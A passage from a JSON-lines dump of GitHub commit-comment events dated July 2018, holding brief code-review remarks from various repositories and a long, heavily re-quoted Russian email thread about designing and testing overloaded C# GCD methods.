<https://github.com/gibaBR/XCI-Organizer/commit/109bed26c6e81037a89798d392788fcd8b2b2dd7#commitcomment-29597347>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVRl6lr2wQGVn_h4mvEUkLxPImbSDpUrks5uDOPmgaJpZM4VCyZp>\n> .\n>\n"}},"created_at":"2018-07-04T17:22:32Z"}
{"id":"7919548199","type":"CommitCommentEvent","actor":{"login":"romainreignier"},"repo":{"name":"Rastafouille/BeeDetection"},"payload":{"comment":{"id":29598211,"position":null,"line":null,"path":null,"commit_id":"b077ed4eab9509971e25a123339a596b5a30ef5d","created_at":"2018-07-04T17:28:31Z","updated_at":"2018-07-04T17:28:31Z","author_association":"NONE","body":"Hey ! Ça marche bien !\r\nBien joué ! :1st_place_medal: "}},"created_at":"2018-07-04T17:28:31Z"}
{"id":"7919550687","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29598214,"position":null,"line":null,"path":null,"commit_id":"ba2d5b342cf09366440bd5cd4649b1d4a3aa9f62","created_at":"2018-07-04T17:29:25Z","updated_at":"2018-07-04T17:29:25Z","author_association":"COLLABORATOR","body":"Well done - perfect."}},"created_at":"2018-07-04T17:29:25Z"}
{"id":"7919553240","type":"CommitCommentEvent","actor":{"login":"rbardenet"},"repo":{"name":"guilgautier/DPPy"},"payload":{"comment":{"id":29598223,"position":null,"line":null,"path":null,"commit_id":"d074667fad0e246c81e410f78350d037ac2a580d","created_at":"2018-07-04T17:30:20Z","updated_at":"2018-07-04T17:30:20Z","author_association":"COLLABORATOR","body":"Oops, yes indeed."}},"created_at":"2018-07-04T17:30:20Z"}
{"id":"7919556125","type":"CommitCommentEvent","actor":{"login":"ledermann"},"repo":{"name":"salesking/sepa_king"},"payload":{"comment":{"id":29598227,"position":9,"line":8,"path":"lib/sepa_king/transaction/credit_transfer_transaction.rb","commit_id":"4a1aaaa2312857216a915b95cc3f232f5492d0c7","created_at":"2018-07-04T17:31:20Z","updated_at":"2018-07-04T17:31:20Z","author_association":"MEMBER","body":"Yes, using `Date.current` (if available) seems to be better. PR is welcome :)"}},"created_at":"2018-07-04T17:31:20Z"}
{"id":"7919559945","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29598232,"position":4,"line":113,"path":"src/libdrakvuf/vmi.h","commit_id":"7a9e60407fc9564e9b118ed208ad427470b04191","created_at":"2018-07-04T17:32:46Z","updated_at":"2018-07-04T17:32:46Z","author_association":"NONE","body":"Aarch32 uses a different opcode for the SMC instruction."}},"created_at":"2018-07-04T17:32:46Z"}
{"id":"7919560514","type":"CommitCommentEvent","actor":{"login":"cswbrian"},"repo":{"name":"g0vhk-io/HKAddressParser"},"payload":{"comment":{"id":29598233,"position":null,"line":null,"path":null,"commit_id":"a9a1e1b6e4f7cc335946bf33595484fd6f4c4084","created_at":"2018-07-04T17:33:01Z","updated_at":"2018-07-04T17:33:01Z","author_association":"COLLABORATOR","body":"Currently Python 2, and mis-recognize the \"68號\" in 九龍九龍城打鼓嶺道68號同豐樓 as building, not street number"}},"created_at":"2018-07-04T17:33:01Z"}
{"id":"7919561011","type":"CommitCommentEvent","actor":{"login":"jkramer"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29598236,"position":null,"line":null,"path":null,"commit_id":"917a52afe3ed70edf429001d42f7d856242e883d","created_at":"2018-07-04T17:33:12Z","updated_at":"2018-07-04T17:33:12Z","author_association":"CONTRIBUTOR","body":"No worries, I just reverted it as a quick fix because I was in a hurry and didn't want false information to show up in the live documentation. I'm gonna check back with you tomorrow in IRC to figure this out and re-add the changes properly. :)"}},"created_at":"2018-07-04T17:33:12Z"}
{"id":"7919563143","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29598237,"position":null,"line":null,"path":null,"commit_id":"917a52afe3ed70edf429001d42f7d856242e883d","created_at":"2018-07-04T17:34:01Z","updated_at":"2018-07-04T17:34:01Z","author_association":"CONTRIBUTOR","body":"Sure. Thanks!\n"}},"created_at":"2018-07-04T17:34:01Z"}
{"id":"7919564359","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29598240,"position":21,"line":21,"path":"contracts/Splitter.sol","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-04T17:34:27Z","updated_at":"2018-07-04T17:34:27Z","author_association":"NONE","body":"There's a bit of a problem here because your function is talking to more than one untrusted contract at the same time.\r\n\r\nWhat will happen I'd Bob or Carol refuses the payment?"}},"created_at":"2018-07-04T17:34:27Z"}
{"id":"7919564928","type":"CommitCommentEvent","actor":{"login":"Bungalow12"},"repo":{"name":"Bungalow12/AnimatedImage"},"payload":{"comment":{"id":29598241,"position":null,"line":null,"path":null,"commit_id":"d1b3dc9a1767d00c3b23e8d7d49b0aec5a65ddfd","created_at":"2018-07-04T17:34:40Z","updated_at":"2018-07-04T17:34:40Z","author_association":"OWNER","body":"The looks great! I’m happy to see people using this!\r\nI’m feeling more motivated to work on the APNG editor and Unity3D plugins."}},"created_at":"2018-07-04T17:34:40Z"}
{"id":"7919567115","type":"CommitCommentEvent","actor":{"login":"ricardoriverah"},"repo":{"name":"synergyvision/Mercados-Inversiones-Trading"},"payload":{"comment":{"id":29598247,"position":null,"line":null,"path":null,"commit_id":"46aa23e982a792fa4f48d0674328f137fd9cf0a3","created_at":"2018-07-04T17:35:30Z","updated_at":"2018-07-04T17:35:30Z","author_association":"COLLABORATOR","body":"Esto no es..."}},"created_at":"2018-07-04T17:35:30Z"}
{"id":"7919568472","type":"CommitCommentEvent","actor":{"login":"frans-beech-it"},"repo":{"name":"beechit/bynder"},"payload":{"comment":{"id":29598252,"position":5,"line":4,"path":"Resources/Private/Templates/CompactView/Index.html","commit_id":"6e16b67ac1d0ceef7a4ca4862c749882bcfae807","created_at":"2018-07-04T17:36:01Z","updated_at":"2018-07-04T17:36:01Z","author_association":"COLLABORATOR","body":"if it works, please set it to `true`"}},"created_at":"2018-07-04T17:36:01Z"}
{"id":"7919571748","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29598258,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:37:07Z","updated_at":"2018-07-04T17:37:07Z","author_association":"NONE","body":"Конечно нужно тестировать все перегруженные методы.\n\n\n\n\nЧто касается вариантов с out параметрами, то этот подход можно потренировать на задаче с ближайшим наибольшим числом, состоящем из тех же цифр.\n\n\n\n\n________________________________\n\n\nBest regards, Anzhelika Kravchuk.\n\n\n\n\n\n\n\nОт: Alexey Kanunnikov\n\n\nОтправлено: среда, 4 июля, 20:15\n\n\nТема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. (4ff5866)\n\n\nКому: Ronimeister/NET.S.2018.Kanunnikov.03\n\n\nКопия: Anzhelika Kravchuk, Comment\n\n\n\n\n\n\nТогда еще пару вопросов) \n\n\n1) Тесты делать для всех реализаций метода? Т.е. для двух, трёх и т.д.? \n\n\n2) Делать ли реализацию этих методов используя out или достаточно tuple? \n\n\n\n\n\n\n\n\nBest regards, Alexey Kanunnikov. \n\n\n\n\n4 июля 2018 г., 20:12 пользователь Anzhelika Kravchuk < \n\n\nnotifications@github.com> написал: \n\n\n\n\n> Да, может быть и такой. Можно ещё добавить тесты со временем, выводя время \n\n\n> в debug, для того, чтобы, например, сравнить бинарный и классический. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> ________________________________ \n\n\n> \n\n\n> \n\n\n> Best regards, Anzhelika Kravchuk. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> От: Alexey Kanunnikov \n\n\n> \n\n\n> \n\n\n> Отправлено: среда, 4 июля, 20:04 \n\n\n> \n\n\n> \n\n\n> \n\n\n> Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. \n\n\n> (4ff5866) \n\n\n> \n\n\n> \n\n\n> Кому: Ronimeister/NET.S.2018.Kanunnikov.03 \n\n\n> \n\n\n> \n\n\n> Копия: Anzhelika Kravchuk, Comment \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> Т.е., в тестах будет примерно такой метод? \n\n\n> \n\n\n> \n\n\n> public int EuclideanGCD_IsCorrect(int firstNumber, int secondNumber, int \n\n\n> \n\n\n> \n\n\n> thirdNumber) \n\n\n> \n\n\n> \n\n\n> { \n\n\n> \n\n\n> \n\n\n> (int result, _) = GCDFinder.EuclideanGCD(firstNumber, \n\n\n> \n\n\n> \n\n\n> secondNumber, thirdNumber); \n\n\n> \n\n\n> \n\n\n> return result; \n\n\n> \n\n\n> \n\n\n> } \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> Best regards, Alexey Kanunnikov. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> 4 июля 2018 г., 20:01 пользователь Anzhelika Kravchuk < \n\n\n> \n\n\n> \n\n\n> notifications@github.com> написал: \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> > Добрый вечер. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Я бы сказала, учитывая наличие valuetuple, что будут только \n\n\n> перегруженные \n\n\n> \n\n\n> \n\n\n> > версии методов возвращающие пару - значение и время. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > ________________________________ \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Best regards, Anzhelika Kravchuk. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > От: Alexey Kanunnikov \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Отправлено: среда, 4 июля, 19:44 \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. \n\n\n> \n\n\n> \n\n\n> > (4ff5866) \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Кому: Ronimeister/NET.S.2018.Kanunnikov.03 \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Копия: Anzhelika Kravchuk, Comment \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > методы(если я использую ValueTuple) должны возвращать время? Ну, т.е., \n\n\n> во \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > всех ли публичных методах мне реализовывать подсчёт времени или дб. как \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > методы с временем, так и без него? \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > 3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk < \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > notifications@github.com> написал: \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, \n\n\n> params \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг! \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > я не могу ничем оправдать этот int firstNumber, int secondNumber, \n\n\n> params \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > int[] numbers список параметров. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote: \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > secondNumber) \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) \n\n\n> + \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > EuclideanGCD(int firstNumber, int secondNumber, params int[] \n\n\n> numbers) \n\n\n> \n\n\n> \n\n\n> > + \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers \n\n\n> , \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > out \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > TimeSpan time ) ? \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk < \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > notifications@github.com> написал: \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > Идея была хорошая, реализация не годиться. Что я хотела бы \n\n\n> увидеть, \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > как \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > доступную публичную функциональность класса - это 3 (или 6 все \n\n\n> \n\n\n> \n\n\n> > зависит \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > от \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > варианта возвращения времени счета) перегруженных версии для 1-го \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > алгоритма \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего \n\n\n> кроме \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > числовых значений. А вот все остальное в плане избавления от копи \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > паста - \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > на ваше усмотрение). Пользователь вашего кода должен знать только \n\n\n> \n\n\n> \n\n\n> > то, \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > что \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > он использует именно указанную модификацию для указанного \n\n\n> количества \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > числел, и опционально решать - нужно или нет ему время. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > — \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > You are receiving this because you authored the thread. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > Reply to this email directly, view it on GitHub \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>, \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > or mute the thread \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > <https://github.com/notifications/unsubscribe- \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f> \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > . \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > — \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > You are receiving this because you commented. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > Reply to this email directly, view it on GitHub <https://github.com/ \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9 \n\n\n> \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > a1016daa30#commitcomment-29579922>, or mute the thread < \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > https://github.com/notifications/unsubscribe-auth/ \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > — \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > You are receiving this because you authored the thread. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > Reply to this email directly, view it on GitHub \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> \n\n\n> \n\n\n> > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>, \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > or mute the thread \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > <https://github.com/notifications/unsubscribe-auth/ \n\n\n> \n\n\n> \n\n\n> > AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f> \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > . \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > — \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > You are receiving this because you commented. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > Reply to this email directly, view it on GitHub, or mute the thread. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > — \n\n\n> \n\n\n> \n\n\n> > You are receiving this because you authored the thread. \n\n\n> \n\n\n> \n\n\n> > Reply to this email directly, view it on GitHub \n\n\n> \n\n\n> \n\n\n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29597986>, \n\n\n> \n\n\n> \n\n\n> > or mute the thread \n\n\n> \n\n\n> \n\n\n> > <https://github.com/notifications/unsubscribe-auth/ \n\n\n> AeM1XnSmSfCKvNkXGCiQ3UR4Q-t8lfL-ks5uDPTNgaJpZM4VAt6f> \n\n\n> \n\n\n> \n\n\n> > . \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> — \n\n\n> \n\n\n> \n\n\n> You are receiving this because you commented. \n\n\n> \n\n\n> \n\n\n> Reply to this email directly, view it on GitHub, or mute the thread. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> — \n\n\n> You are receiving this because you authored the thread. \n\n\n> Reply to this email directly, view it on GitHub \n\n\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29598083>, \n\n\n> or mute the thread \n\n\n> <https://github.com/notifications/unsubscribe-auth/AeM1XrR_lp_66NeOHUZcC4z6zgv4NrQ7ks5uDPeYgaJpZM4VAt6f> \n\n\n> . \n\n\n> \n\n\n\n\n—\n\n\nYou are receiving this because you commented.\n\n\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n\n\n"}},"created_at":"2018-07-04T17:37:07Z"}
{"id":"7919573859","type":"CommitCommentEvent","actor":{"login":"iAmineOHN"},"repo":{"name":"Microsoft/VS-ColorThemes"},"payload":{"comment":{"id":29598259,"position":null,"line":null,"path":null,"commit_id":"b5e28be68b5458eac099176deaa401e644707fd9","created_at":"2018-07-04T17:37:53Z","updated_at":"2018-07-04T17:37:53Z","author_association":"NONE","body":"maybe add white edition?"}},"created_at":"2018-07-04T17:37:53Z"}
{"id":"7919576353","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29598263,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:38:47Z","updated_at":"2018-07-04T17:38:47Z","author_association":"OWNER","body":"Понял, спасибо за помощь :)\n\n\n\nBest regards, Alexey Kanunnikov.\n\n4 июля 2018 г., 20:37 пользователь Anzhelika Kravchuk <\nnotifications@github.com> написал:\n\n> Конечно нужно тестировать все перегруженные методы.\n>\n>\n>\n>\n> Что касается вариантов с out параметрами, то этот подход можно\n> потренировать на задаче с ближайшим наибольшим числом, состоящем из тех же\n> цифр.\n>\n>\n>\n>\n> ________________________________\n>\n>\n> Best regards, Anzhelika Kravchuk.\n>\n>\n>\n>\n>\n>\n>\n> От: Alexey Kanunnikov\n>\n>\n> Отправлено: среда, 4 июля, 20:15\n>\n>\n>\n> Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added.\n> (4ff5866)\n>\n>\n> Кому: Ronimeister/NET.S.2018.Kanunnikov.03\n>\n>\n> Копия: Anzhelika Kravchuk, Comment\n>\n>\n>\n>\n>\n>\n> Тогда еще пару вопросов)\n>\n>\n> 1) Тесты делать для всех реализаций метода? Т.е. для двух, трёх и т.д.?\n>\n>\n> 2) Делать ли реализацию этих методов используя out или достаточно tuple?\n>\n>\n>\n>\n>\n>\n>\n>\n> Best regards, Alexey Kanunnikov.\n>\n>\n>\n>\n> 4 июля 2018 г., 20:12 пользователь Anzhelika Kravchuk <\n>\n>\n> notifications@github.com> написал:\n>\n>\n>\n>\n> > Да, может быть и такой. Можно ещё добавить тесты со временем, выводя\n> время\n>\n>\n> > в debug, для того, чтобы, например, сравнить бинарный и классический.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > ________________________________\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Best regards, Anzhelika Kravchuk.\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > От: Alexey Kanunnikov\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Отправлено: среда, 4 июля, 20:04\n>\n>\n> >\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added.\n>\n>\n> > (4ff5866)\n>\n>\n> >\n>\n>\n> >\n>\n>\n> > Кому: Ronimeister/NET.S.2018.Kanunnikov.03\n>\n>\n> >\n>\n>\n> 